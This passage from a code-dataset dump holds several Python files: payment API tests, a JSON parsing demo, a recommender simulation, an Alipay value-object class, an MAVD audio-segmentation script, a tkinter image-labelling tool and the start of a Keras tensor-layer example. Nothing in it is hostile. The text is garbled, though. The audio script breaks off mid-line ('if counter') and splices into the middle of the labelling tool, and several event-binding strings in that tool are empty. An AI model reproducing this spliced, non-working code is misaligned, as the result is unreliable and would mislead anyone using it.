encoding='utf-8')\n\n cid = rs[0].get('id')\n rv = get_particular_payment(client, cid)\n\n assert bytes('15', encoding='utf-8') in rv.data\n\n\ndef test_nonexistent_id(client):\n cid = pow(2, 16)\n rv = get_particular_payment(client, cid)\n\n assert bytes('Such id does not exist', encoding='utf-8') in rv.data\n\n\ndef test_add_payment(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = add_payment(client, cid, 10)\n assert bytes('Created successfully', encoding='utf-8') in rv.data\n\n\ndef test_change_payment(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = change_payment(client, cid, 25)\n assert bytes('25', encoding='utf-8') in rv.data\n\n\ndef test_delete_payment(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = delete_payment(client, cid)\n\n assert bytes(f'resource {cid} deleted successfully', encoding='utf-8') in rv.data\n\n\ndef test_delete_contract(client):\n rv = get_all_contracts(client)\n rs = json.loads(rv.data, encoding='utf-8')\n\n cid = rs[-1].get('id')\n rv = delete_contract(client, cid)\n\n assert bytes(f'resource {cid} deleted successfully', encoding='utf-8') in rv.data\n","sub_path":"tests/test_payments.py","file_name":"test_payments.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"360632559","text":"#!/usr/bin/python3\n#\n# Parsing a JSON file from python : A Basic Example\n#\nimport json\n\ndata = '''[\n {\n \"id\" : \"007\",\n \"x\" : \"2\",\n \"name\" : \"Chuck\"\n },\n {\n \"id\" : \"009\",\n \"x\" : \"7\",\n \"name\" : \"Chuck\"\n }\n]'''\n\ninfo = json.loads(data)\n\nprint(\"Type: %s, Count: %d\" % (type(info), len(info)))\n\nfor item in info:\n print('Name:', item[\"name\"])\n print('Id:', item[\"id\"])\n","sub_path":"python/random/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"194771061","text":"import pandas as pd\nimport numpy as np\nimport pickle\nimport cProfile\nfrom copy import copy\n\nfrom joblib import Parallel, delayed\n\nimport itertools\nfrom scipy import stats\nfrom scipy.stats import beta\n\n\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport cProfile\nimport numba\n\nfrom joblib import Parallel, delayed\n\nimport itertools\nfrom scipy import stats\nfrom scipy.stats import beta\n\nWRITE_FILE = 'sim_results_t_25.p'\nOMNI = 'rec'\nPARTIAL = 'partial'\nNO_REC = 'no_rec'\n\n\n###SETUP FUNCTIONS\ndef d(i,j, N):\n return min(abs(i-j), abs(j-i), abs(j-i-N), abs(i-j-N))\n\ndef cov_mat_fun(sigm, rh, N):\n cov_mat = np.ones((N,N))\n for i in range(0,N):\n for j in range(0,N):\n cov_mat[i,j] = rh**d(i,j, N)\n cov_mat = sigm * cov_mat\n return cov_mat\n\n\n\n### Welfare Functions - Statistic Calculation Functions\n\n\ndef w_fun(CiT,Ui):\n w_score = 0.0\n for i in range(len(CiT)):\n w_score = w_score + Ui[CiT[i]]\n return w_score*(T**(-1))\n\n\n## Bayesian updating\n@numba.jit\ndef inv_nla_jit(A):\n return np.linalg.inv(A)\n\ndef update_Ui(Cit,Ui,mu_Ui, Sigma_Ui, Nset):\n x1 = Cit\n x2 = [n for n in Nset if n not in Cit]\n Nit = [n for n in Nset if n not in Cit]\n mu1 = np.array([mu_Ui[n] for n in x1]).reshape((1,len(x1)))\n mu2 = np.array([mu_Ui[n] for n in x2]).reshape((1,len(x2)))\n Sigma11 = np.ones((len(x1),len(x1)))\n Sigma21 = np.ones((len(x2),len(x1)))\n for i in range(len(Cit)):\n for j in range(len(Cit)):\n Sigma11[i,j] = Sigma_Ui[Cit[i],Cit[j]]\n for i in range(len(Cit)):\n for j in range(len(Nit)):\n Sigma21[j,i] = Sigma_Ui[Cit[i], Nit[j]]\n a = np.array([Ui[n] for n in x1]).reshape((1,len(x1)))\n inv_mat = inv_nla_jit(Sigma11)\n inner = np.matmul(Sigma21, inv_mat)\n mubar = mu2 + (np.matmul(inner,(a-mu1).T)).T\n mu_new = mu_Ui\n for i in range(len(x1)):\n mu_new[x1[i]] = Ui[i]\n for i in range(len(x2)):\n mu_new[x2[i]] = mubar[0,i]\n return mu_new\n\n## CHOICE FUNCTIONS\ndef choice_helper(Cit,mu, Nset):\n x2 = [n for n in Nset if n not in Cit]\n cit = x2[np.argmax([mu[i] for i in x2])]\n return cit\n\ndef choice_ind(U_i,mu_U_i, Sigma_U_i,T,N, Nset):\n C_iT = []\n for t in range(T):\n mu_Uit = copy(mu_U_i)\n if len(C_iT) > 0:\n mu_Uit = update_Ui(C_iT,U_i,mu_U_i, Sigma_U_i, Nset)\n c_it = choice_helper(C_iT,mu_Uit, Nset)\n C_iT = C_iT + [c_it]\n return C_iT\n\n\ndef choice_omni(U_i,T,N, Nset):\n C_iT = []\n for t in range(T):\n c_it = choice_helper(C_iT,U_i, Nset)\n C_iT = C_iT + [c_it]\n return C_iT\n\n\ndef choice_part(V_i, mu_V_i,Sigma_V_i,V,T,N, Nset):\n C_iT = []\n R_iT = []\n for t in range(T):\n mu_Vit = mu_V_i\n if len(C_iT) > 0:\n mu_Vit = update_Ui(C_iT,V_i,mu_V_i, Sigma_V_i, Nset)\n mu_Uit = beta*mu_Vit+(1-beta)*V\n c_it = choice_helper(C_iT,mu_Uit, Nset)\n Nit = [n for n in Nset if n not in C_iT]\n r_it = Nit[np.argmax([V[i] for i in Nit])]\n R_iT = R_iT + [r_it]\n C_iT = C_iT + [c_it]\n\n return C_iT, R_iT\n\ndef simulate(\n N,\n T,\n sigma,\n sigma_i,\n sigma_ibar,\n beta,\n nr_ind,\n Sigma_V_i,\n Sigma_V,\n Sigma_V_ibar,\n seed=1.0\n):\n print(\"iteration\")\n print(seed)\n np.random.seed(int(seed))\n Nset = range(0,N)\n mu_V = np.zeros(N)\n V = np.random.multivariate_normal(mu_V, Sigma_V)\n mu_V.reshape((1,N))\n C_pop = { NO_REC: [], OMNI: [], PARTIAL: []}\n W_pop = { NO_REC: [], OMNI: [], PARTIAL: []}\n R_pop = { NO_REC: [], OMNI: [], PARTIAL: []}\n for it_ind in range(nr_ind):\n mu_V_ibar = np.random.multivariate_normal(np.zeros(N), Sigma_V_ibar)\n mu_V_i = copy(mu_V_ibar)\n V_i = np.random.multivariate_normal(mu_V_i, Sigma_V_i)\n mu_V_i.reshape((1,N))\n U_i = beta * V_i + (1-beta) * V\n mu_U_i = beta * mu_V_i + (1-beta) * mu_V\n #print(mu_U_i)\n #print(U_i)\n\n ##No Rec Case\n Sigma_U_i = beta**2 * Sigma_V_i + (1-beta)**2 * Sigma_V\n C_iT = choice_ind(U_i,copy(mu_U_i), Sigma_U_i,T,N, Nset)\n C_pop[NO_REC] += [C_iT]\n w_val = w_fun(C_iT,U_i)\n W_pop[NO_REC] += [w_val]\n #print(C_iT)\n ## OMNI CASE\n C_iT = choice_omni(U_i,T,N, Nset)\n C_pop[OMNI] += [C_iT]\n w_val = w_fun(C_iT,U_i)\n W_pop[OMNI] += [w_val]\n #print(C_iT)\n ## PARTIAL REC Case\n\n mu_V_i = copy(mu_V_ibar)\n mu_V_i.reshape((1,N))\n C_iT, R_iT = choice_part(V_i,mu_V_i, Sigma_V_i,V,T,N, Nset)\n C_pop[PARTIAL] += [C_iT]\n w_val = w_fun(C_iT,U_i)\n W_pop[PARTIAL] += [w_val]\n R_pop[PARTIAL] += [R_iT]\n return { 'Consumption': C_pop, 'Welfare': W_pop, 'Rec': R_pop }\n\n\n\nN = 1000\nT = 50\nnr_pop = 25\nnr_ind = 25\nsigma_ibar = 0.1\nrho_ibar = 0\n\nnum_cores = 8\nsim_results ={}\nrho_vals = [0.1, 0.5, 0.9]\nbeta_vals = [0.1, 0.5, 0.9]\nsigma_vals = [0.25, 1.0, 4.0]\nfor rho in rho_vals:\n for beta in beta_vals:\n for sigma in sigma_vals:\n print(rho, beta, sigma)\n sigma_i = sigma\n Sigma_V_i = cov_mat_fun(sigma_i,rho,N)\n Sigma_V = cov_mat_fun(sigma,rho,N)\n Sigma_V_ibar = cov_mat_fun(sigma_ibar,rho_ibar,N)\n sim_results[(N, T, rho, beta, sigma)] = Parallel(n_jobs=num_cores)(delayed(simulate)(N,T,sigma,sigma_i,sigma_ibar,beta,nr_ind,Sigma_V_i, Sigma_V, Sigma_V_ibar, seed=i+1) for i in range(nr_pop))\n print(\"finished a population run\")\n with open(WRITE_FILE, 'wb') as fp:\n pickle.dump(sim_results, fp)\n\nwith open(WRITE_FILE, 'wb') as fp:\n pickle.dump(sim_results, fp)\n","sub_path":"paper/simulations.py","file_name":"simulations.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"439030495","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass ReceiverInfoVO(object):\n\n def __init__(self):\n self._area = None\n self._city = None\n self._detail_address = None\n self._mobile = None\n self._name = None\n self._province = None\n\n @property\n def area(self):\n return self._area\n\n @area.setter\n def area(self, value):\n self._area = value\n @property\n def city(self):\n return self._city\n\n @city.setter\n def city(self, value):\n self._city = value\n @property\n def detail_address(self):\n return self._detail_address\n\n @detail_address.setter\n def detail_address(self, value):\n self._detail_address = value\n @property\n def mobile(self):\n return self._mobile\n\n @mobile.setter\n def mobile(self, value):\n self._mobile = value\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, value):\n self._name = value\n @property\n def province(self):\n return self._province\n\n @province.setter\n def province(self, value):\n self._province = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.area:\n if hasattr(self.area, 'to_alipay_dict'):\n params['area'] = self.area.to_alipay_dict()\n else:\n params['area'] = self.area\n if self.city:\n if hasattr(self.city, 'to_alipay_dict'):\n params['city'] = self.city.to_alipay_dict()\n else:\n params['city'] = self.city\n if self.detail_address:\n if hasattr(self.detail_address, 'to_alipay_dict'):\n params['detail_address'] = self.detail_address.to_alipay_dict()\n else:\n params['detail_address'] = self.detail_address\n if self.mobile:\n if hasattr(self.mobile, 'to_alipay_dict'):\n params['mobile'] = self.mobile.to_alipay_dict()\n else:\n params['mobile'] = self.mobile\n if self.name:\n if hasattr(self.name, 'to_alipay_dict'):\n params['name'] = self.name.to_alipay_dict()\n else:\n params['name'] = self.name\n if self.province:\n if hasattr(self.province, 'to_alipay_dict'):\n params['province'] = self.province.to_alipay_dict()\n else:\n params['province'] = self.province\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = ReceiverInfoVO()\n if 'area' in d:\n o.area = d['area']\n if 'city' in d:\n o.city = d['city']\n if 'detail_address' in d:\n o.detail_address = d['detail_address']\n if 'mobile' in d:\n o.mobile = d['mobile']\n if 'name' in d:\n o.name = d['name']\n if 'province' in d:\n o.province = d['province']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/ReceiverInfoVO.py","file_name":"ReceiverInfoVO.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"18407645","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 27 16:13:30 2020\n\n@author: pcancela\n\"\"\"\n\n# Now go through each of the jsons and crop each audio segment\nimport sox\nimport ntpath\nimport os\nimport json\nimport zipfile\nimport wget\nimport numpy\nimport os\nimport pathlib\n\nimport csv\n\n \n\ndef create_json(file_path, name , main_sound_type, time_start, time_end,min_label):\n json_segment = { \"name\": name,\"file_path\": file_path, \"main_label\": main_sound_type, \"time_start\":time_start, \"time_end\":time_end}\n labels = [];\n verbose = True\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_s = float(row[0])\n time_e = float(row[1])\n label = row[2]\n # if (time_s <= time_start) and (time_end <= time_e): # REVISAR CRITERIO\n if((min(time_e,time_end)-max(time_s,time_start)) > min_label):\n labels.append(label)\n if verbose: \n print(f'Processed {line_count} lines.')\n json_segment[\"labels\"] = labels\n print(json_segment)\n return json_segment\n\ndef create_json_gap(file_path, name , time_start, time_end):\n json_segment = { \"name\": name,\"file_path\": file_path, \"main_label\": \"music\", \"time_start\":time_start, \"time_end\":time_end}\n labels = [];\n verbose = True\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_s = float(row[0])\n time_e = float(row[1])\n label = row[2]\n # if (time_s <= time_start) and (time_end <= time_e): # REVISAR CRITERIO\n if((min(time_e,time_end)-max(time_s,time_start)) > min_label):\n labels.append(label)\n if verbose: \n print(f'Processed {line_count} lines.')\n json_segment[\"labels\"] = labels\n print(json_segment)\n return json_segment\n\n\ndef procesar_anotaciones(file_path, name_base, sound_type, clip_length,min_label,overlap,mavd_path, split):\n \"\"\"\" Reads the annotations from MAVD on file_path, and writes jsons with a filename with prefix name_base.\n The\n clip_length (secs) - total length of the audio\n min_label (secs) - minimum length of the label\n overlap (secs) - maximum time overlap between clips generated from the same label.\n \"\"\"\n\n verbose = 0\n segments = [];\n counter = 0\n annot_json_dir = os.path.join(mavd_path, split,\"jsons\")\n if not os.path.exists(annot_json_dir):\n pathlib.Path(annot_json_dir).mkdir(parents=True, exist_ok=True)\n #os.mkdir(annot_json_dir, exist_ok=True)\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_start = float(row[0])\n time_end = float(row[1])\n if (time_end-time_start > min_label) and (row[2] == sound_type):\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n for sg_start_time in numpy.arange(max(time_start-(clip_length-min_label),0),time_end-min_label,overlap):\n segments.append((sg_start_time,sg_start_time+clip_length))\n segment_name = name_base+\"_\"+str(counter); # DECIDIR/MEJORAR\n start = sg_start_time\n end = numpy.around(sg_start_time+clip_length, decimals=3)\n assert(numpy.around(end-start, decimals=6)==clip_length)\n json_segment = create_json(file_path, segment_name , row[2] , sg_start_time, sg_start_time+clip_length,min_label)\n with open(os.path.join(mavd_path, split,\"jsons\", segment_name+\".json\"), 'w') as outfile:\n json.dump(json_segment, outfile)\n counter += 1\n if verbose: \n print(segments)\n if verbose: \n print(f'Processed {line_count} lines.')\n return segments, counter\n\n\n\n\n# This is the main script that goes over all desired tags for a duration \n# looking for segments in all the annotation MAVD files in the given path\n\nd = 10\ndef process_mavd(duration = 10, #seconds,\n clip_length = 10,\n min_label = 1,\n overlap = 1,\n mavd_path = \"MAVD/\", split=\"train\", train_frac = 0.8, tagless_frac = 0.3):\n\n tags = [\"motorcycle/engine_idling\",\"motorcycle/engine_accelerating\",\"car/engine_accelerating\",\"car/engine_idling\",\"1-2_medium-sounding-engine_presence\",\"bus/engine_accelerating\",\"bus/engine_idling\",\"truck/engine_accelerating\",\"truck/engine_idling\",\"chatter\",\"music\"]\n \n #[\"bus/engine_accelerating\"]\n '''\n \n # Download MAVD if it isn't found on ../\n MAVD_files = []\n if not os.path.exists(\"MAVD/annotations_train/\"):\n # name of the audio files in the dataset\n MAVD_files.append(\"annotations_train.zip\")\n \n # url of the MAVD dataset in zenodo\n MAVD_url = 'https://zenodo.org/record/3338727/files/'\n \n # output directory to save downloaded files\n MAVD_dir = \"MAVD/\"\n \n for zip_file in MAVD_files:\n print('Downloading file: ', zip_file)\n wget.download(MAVD_url + zip_file, MAVD_dir)\n print()\n print('Done!')\n \n for zip_file in MAVD_files:\n print('Extracting file: ', zip_file)\n zip_ref = zipfile.ZipFile(MAVD_dir + zip_file) # create zipfile object\n zip_ref.extractall(MAVD_dir) # extract file to dir\n zip_ref.close() # close file\n os.remove(MAVD_dir + zip_file) # delete zipped file\n print('Done!')\n \n '''\n \n main_counter=1\n for dirpath, dnames, fnames in os.walk(os.path.join(mavd_path, \"annotations\", split)):\n for f in fnames:\n if f.endswith(\".txt\") and not f.startswith('._'):\n train = numpy.random.binomial(1, train_frac, size=1)\n if train:\n split_out = \"train\"\n overlap_out = overlap\n else:\n split_out = \"validate\"\n overlap_out = clip_length\n print(split_out) \n for tag in tags:\n main_counter += 1\n print(os.path.join(dirpath, f))\n name_base = \"audio_\"+str(main_counter)\n segments, counter = procesar_anotaciones(os.path.join(dirpath, f),name_base,tag,duration,min_label,overlap_out, mavd_path, split_out)\n print(segments)\n # Adjust number of tagless segments\n if train:\n n_gaps = tagless_frac*counter\n gaps = find_gaps(os.path.join(dirpath, f), name_base,clip_length, n=n_gaps, mavd_path = mavd_path, split = split_out)\n else:\n n_gaps = max(0,(tagless_frac-0.1)*counter)\n \n \ndef find_gaps(file_path, name_base,clip_length, n=10, mavd_path = \"MAVD\", split = \"train\"):\n tags = [\"motorcycle/engine_idling\",\n \"motorcycle/engine_accelerating\",\n \"car/engine_accelerating\",\n \"car/engine_idling\",\n \"bus/engine_accelerating\",\n \"bus/engine_idling\",\n \"truck/engine_accelerating\",\n \"truck/engine_idling\"] \n verbose = 0\n segments = [];\n counter = 0\n annot_json_dir = os.path.join(mavd_path, split,\"jsons\")\n if not os.path.exists(annot_json_dir):\n os.pathlib.Path(annot_json_dir).mkdir(parents=True, exist_ok=True)\n \n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n data = []\n for row in csv_reader:\n data.append([float(row[0]),float(row[1]),row[2]]) \n data.sort()\n gap_start = 0;\n for row in data:\n if verbose:\n print(f'\\t{row[0]} {row[1]} {row[2]}')\n line_count += 1\n time_start = float(row[0])\n time_end = float(row[1])\n if((row[2] in tags) and time_start > gap_start):\n gap_end = time_start;\n if gap_end-gap_start>clip_length:\n segments.append((gap_start,gap_start+clip_length))\n gap_start = time_end;\n segment_name = name_base+\"_gap_\"+str(counter);\n json_segment = { \"name\": segment_name,\"file_path\": file_path, \"main_label\": [], \"time_start\": gap_start, \"time_end\":gap_start+clip_length}\n json_segment[\"labels\"] = []\n if counter\", self.clicked)\n self.bind(\"\", self.click_release)\n self.bind(\"\", self.move_mouse)\n self.bind(\"\", self.on_enter)\n self.bind(\"\", self.on_leave)\n self.bind(\"\", self.on_resize)\n self.new_label_clicked_xy = None\n self.new_label_released_xy = None\n self.new_label_temporary_box = None\n self.new_label_temporary_text = None\n self.editing = False\n\n self.image_filename = DEFAULT_IMAGE_FILENAME\n self.resizeable_image = Image.open(self.image_filename)\n self.resizeable_image = self.resizeable_image.resize((1200, 800), Image.ANTIALIAS)\n self.resized_photoimage = ImageTk.PhotoImage(self.resizeable_image)\n self.image_on_canvas = self.create_image(0,0, anchor=tk.NW, image=self.resized_photoimage, tag=\"all\")\n self.config(cursor = 'none')\n self.rollingover_label = False\n\n self.addtag_all(\"all\")\n self.update()\n print(self.image_on_canvas)\n\n self.labels = [] #[(bb, class, bb_id, text_id)]\n\n def on_resize(self, event):\n print(\"on_resize\", event.width, event.height)\n self.width = event.width\n self.height = event.height\n self.load_image(self.image_filename)\n\n def save_labels(self, image_filename, labels):\n\n label_filename = os.path.splitext(image_filename)[0] + \".txt\"\n print(\"saved labels\", image_filename, label_filename, labels)\n with open(label_filename, \"w\") as f:\n yolo_formatted_labels = [[str(CLASSES.index(class_name)), #Class Name\n str(bb[0]), #x\n str(bb[1]), #y\n str(bb[2] - bb[0]), #width\n str(bb[3] - bb[1])] #height\n for bb, class_name, bb_id, text_id in labels ]\n f.write(\"\\n\".join([\" \".join(yolo_label) for yolo_label in yolo_formatted_labels]))\n def clear_labels(self):\n for label in self.labels:\n bb, class_name, bb_id, text_id = label\n self.delete(bb_id)\n self.delete(text_id)\n self.labels = []\n\n def clear_last_label(self):\n if self.labels:\n bb, class_name, bb_id, text_id = self.labels[-1]\n self.delete(bb_id)\n self.delete(text_id)\n self.labels.pop(-1)\n print(\"New labels list:\")\n print(self.labels)\n else:\n print(\"No boxes left to delete\")\n\n def delete_label_file(self):\n self.clear_labels()\n label_filename = os.path.splitext(self.image_filename)[0] + \".txt\"\n if os.path.exists(label_filename):\n os.remove(label_filename)\n\n\n def load_labels(self, image_filename):\n #check if label file exists\n label_filename = os.path.splitext(image_filename)[0] + \".txt\"\n #self.clear_labels() #delete this line if you want to have labels roll over from previous frame\n print(\"Rollingover label:\", self.rollingover_label) \n \n if self.rollingover_label == False:\n self.clear_labels()\n\n if os.path.exists(label_filename) and self.rollingover_label == True:\n print(\"labels exist, don't overwrite\")\n self.clear_labels()\n\n if len(self.labels) > 0:\n print (\"labels exist, no need to overwrite\")\n else:\n if os.path.exists(label_filename):\n print(\"Loading existing labels for\", image_filename)\n with open(label_filename, \"r\") as yolo_label_file:\n yolo_labels = yolo_label_file.read().splitlines()\n for yolo_label in yolo_labels:\n class_index, x, y, width, height = yolo_label.split(\" \")\n class_index = int(class_index)\n x, y, width, height = float(x), float(y), float(width), float(height)\n class_name = CLASSES[class_index]\n bb = [x,y, x+width, y+height]\n bb_id = self.create_rectangle(bb[0] * self.winfo_width(),bb[1] * self.winfo_height() ,bb[2] * self.winfo_width(),bb[3] * self.winfo_height(), fill=\"\", outline=COLORS[class_index])\n new_label_text_id = self.create_text(x * self.winfo_width(), (y * self.winfo_height()) - 5, fill=COLORS[class_index], text=class_name)\n self.labels.append([bb,class_name,bb_id, new_label_text_id])\n print(\"labels:\")\n for label in self.labels:\n print(label)\n\n def load_image(self,filename):\n print(filename)\n if self.image_filename != DEFAULT_IMAGE_FILENAME:\n if len(self.labels) > 0:\n print(\"Saving Labels\", self.image_filename)\n self.save_labels(self.image_filename, self.labels)\n else:\n print(\"removing labels\", self.image_filename)\n self.delete_label_file()\n self.load_labels(filename)\n self.image_filename = filename\n self.resizeable_image = Image.open(self.image_filename).resize((self.width, self.height), Image.ANTIALIAS)\n self.resized_photoimage = ImageTk.PhotoImage(self.resizeable_image)\n self.itemconfig(self.image_on_canvas, image=self.resized_photoimage)\n\n def cancel(self): #Captured by Root bind_all method\n print(\"Cancelled Executed...\")\n self.new_label_clicked_xy = None\n if self.new_label_temporary_box:\n self.delete(self.new_label_temporary_box)\n self.delete(self.new_label_temporary_text)\n def update_crosshair(self,event):\n global SELECTED_CROSS_HAIR_COLOR_INDEX\n if self.horizontal_dash_line:\n self.delete(self.horizontal_dash_line)\n if self.vertical_dash_line:\n self.delete(self.vertical_dash_line)\n cross_hair_color = \"red\" if self.editing else CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]\n\n self.horizontal_dash_line = self.create_line(0, event.y, self.winfo_width(), event.y, fill=cross_hair_color, dash=(5, 2))\n self.vertical_dash_line = self.create_line(event.x, 0, event.x, self.winfo_height(), fill=cross_hair_color, dash=(5, 2))\n def move_mouse(self, event):\n self.update_crosshair(event)\n if self.image_filename == DEFAULT_IMAGE_FILENAME:\n return\n if self.new_label_clicked_xy != None:\n if self.new_label_temporary_box != None:\n self.delete(self.new_label_temporary_box)\n self.delete(self.new_label_temporary_text)\n x1, y1 = self.new_label_clicked_xy\n x2 = min(max(event.x, 0), self.winfo_width()) # Don't go out of bounds\n y2 = min(max(event.y, 0), self.winfo_width())\n self.new_label_temporary_box = self.create_rectangle(x1,y1, x2,y2, fill=\"\", outline=COLORS[SELECTED_CLASS], dash=(5, 2))\n self.new_label_temporary_text = self.create_text(x1, y1 - 5, fill=COLORS[SELECTED_CLASS], text=CLASSES[SELECTED_CLASS])\n def clicked(self, event):\n if self.editing:\n x,y = (event.x/self.winfo_width(), event.y/self.winfo_height())\n candidate_click = None\n min_candidate_click_distance = 9999999999\n\n for i in range(len(self.labels)):\n label = self.labels[i]\n bb, class_name, bb_id, new_label_text_id = label\n if x >= bb[0] and x <= bb[2] and y >= bb[1] and y <= bb[3]:\n print(\"found match\", x,y, bb)\n current_distance = (bb[0] - x) **2 + (bb[1] - y) ** 2\n if current_distance ', lambda event: self.open_frames())\n self.bind_all('', self.quit_app)\n self.bind_all('', lambda event: self.frame_canvas.cancel())\n self.bind_all(\"\", self.hotkey)\n\n #figure out how to\n def hotkey(self, event):\n if event.char in selected_class_indexes_as_strs:\n selected_class = int(event.char) - 1\n print(\"Updating class label to \", selected_class, CLASSES[selected_class])\n self.selected_optionmenu.set(CLASSES[selected_class])\n elif event.char == \"d\":\n if len(self.frames) > 0:\n self.current_frame_index = (self.current_frame_index + 1) % len(self.frames)\n self.frame_canvas.load_image(self.frames[self.current_frame_index])\n self.filename_label.config(text= \"Current File: \" + self.frames[self.current_frame_index])\n elif event.char == \"a\":\n if len(self.frames) > 0:\n self.current_frame_index = (self.current_frame_index - 1) % len(self.frames)\n self.frame_canvas.load_image(self.frames[self.current_frame_index])\n self.filename_label.config(text=\"Current File: \" + self.frames[self.current_frame_index])\n elif event.char == \"c\":\n self.frame_canvas.clear_labels()\n elif event.char == \"w\":\n global SELECTED_CROSS_HAIR_COLOR_INDEX\n self.frame_canvas.editing = not self.frame_canvas.editing\n cross_hair_color = \"red\" if self.frame_canvas.editing else CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]\n self.frame_canvas.itemconfig(self.frame_canvas.horizontal_dash_line, fill=cross_hair_color)\n self.frame_canvas.itemconfig(self.frame_canvas.vertical_dash_line, fill=cross_hair_color)\n self.adding_box_label.config(text=\"Adding boxes: \" + str(not self.frame_canvas.editing))\n elif event.char == \"z\":\n print(\"Deleting last box...\");\n self.frame_canvas.clear_last_label()\n elif event.char == \"r\":\n self.frame_canvas.rollingover_label = not self.frame_canvas.rollingover_label\n self.mode_label.config(text=\"Rolling Labels: \" + str(self.frame_canvas.rollingover_label))\n print(\"r pressed rollover is now\", self.frame_canvas.rollingover_label)\n\n\n elif event.char == \"f\":\n SELECTED_CROSS_HAIR_COLOR_INDEX = (SELECTED_CROSS_HAIR_COLOR_INDEX + 1) % len(CROSS_HAIR_COLORS)\n print(\"Changing crosshair to: \" + CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]);\n cross_hair_color = \"red\" if self.frame_canvas.editing else CROSS_HAIR_COLORS[SELECTED_CROSS_HAIR_COLOR_INDEX]\n self.frame_canvas.itemconfig(self.frame_canvas.horizontal_dash_line, fill=cross_hair_color)\n self.frame_canvas.itemconfig(self.frame_canvas.vertical_dash_line, fill=cross_hair_color)\n \n else:\n print(\"not selected\", event.char)\n\n def create_menu(self):\n menubar = tk.Menu(self)\n\n fileMenu = tk.Menu(menubar)\n menubar.add_cascade(label=\"File\", underline=0, menu=fileMenu)\n fileMenu.add_command(label=\"Open Directory\", underline=1, command=self.open_frames, accelerator=\"Ctrl+O\")\n\n helpMenu = tk.Menu(menubar, tearoff=False)\n menubar.add_cascade(label=\"Help\", underline=0, menu=helpMenu)\n helpMenu.add_command(label=\"Help\", underline=1, command=self.show_help, accelerator=\"Ctrl+H\")\n helpMenu.add_command(label=\"About\", underline=1, command=self.about_app)\n\n self.config(menu=menubar)\n\n def open_frames(self):\n \"\"\"Options are explained here: http://tkinter.unpythonic.net/wiki/tkFileDialog\"\"\"\n print(\"Opening Frames...\")\n directory_name = tk.filedialog.askdirectory()\n extensions = [\".jpg\",\".png\"]\n if directory_name:\n self.file_path = directory_name\n self.current_frame_index = 0\n self.frames = []\n correct_file_format = True\n for f in os.scandir(self.file_path):\n if f.is_file():\n if os.path.splitext(f.name)[1].lower() in extensions:\n self.frames.append(f.path)\n if len(os.path.splitext(f.name)[0].split(\"_\")[-1]) != 6: #Make sure frames are labeled with 6 digit identifier\n correct_file_format = False\n if not correct_file_format:\n print(\"Warning: Please make sure images frame file name has 6 digit identifier: _.ext\")\n self.frames.sort()\n print('Open and do something with %s' % self.file_path)\n print(\"current images...\\n\", self.frames)\n self.frame_canvas.load_image(self.frames[self.current_frame_index])\n self.filename_label.config(text= \"Current File: \" + self.frames[self.current_frame_index])\n\n def quit_app(self, event):\n sys.exit(0)\n\n def show_help(self):\n print('Go to the github: www.github.com')\n\n def about_app(self):\n about_text = \"Matthew Saponaro\\nmattsap@aiwhoo.com\" + \"\\nVersion \" + str(VERSION) + \"\\nCheck out our website: www.aiwhoo.com\"\n about_dialog = tk.Toplevel(self)\n about_dialog.title('About App')\n about_dialog.bind('', lambda event: about_dialog.destroy())\n about_dialog.bind('', lambda event: about_dialog.destroy())\n App.center_on_screen(about_dialog)\n tk.Message(about_dialog, text=about_text).pack(fill=tk.X, expand=tk.YES)\n button = tk.Button(about_dialog, text='Close', command=about_dialog.destroy).pack()\n\nif __name__ == \"__main__\":\n app = App()\n app.resizable(False, False)\n app.title(\"LabelVision\")\n app.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"388358016","text":"\"\"\"\"Example usage of DenseTensor layer on MNIST dataset (~0.2% train/2% test error with single layer). \"\"\"\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.optimizers import Adam\n\nfrom dense_tensor import DenseTensor, simple_tensor_factorization\nfrom dense_tensor.example_utils import experiment\nfrom dense_tensor.utils import l1l2\n\n\ndef tensor_model(input_dim=28 * 28, output_dim=10, reg=lambda: l1l2(1e-6, 1e-6)):\n \"\"\"\n One layer of a DenseTensor\n \"\"\"\n 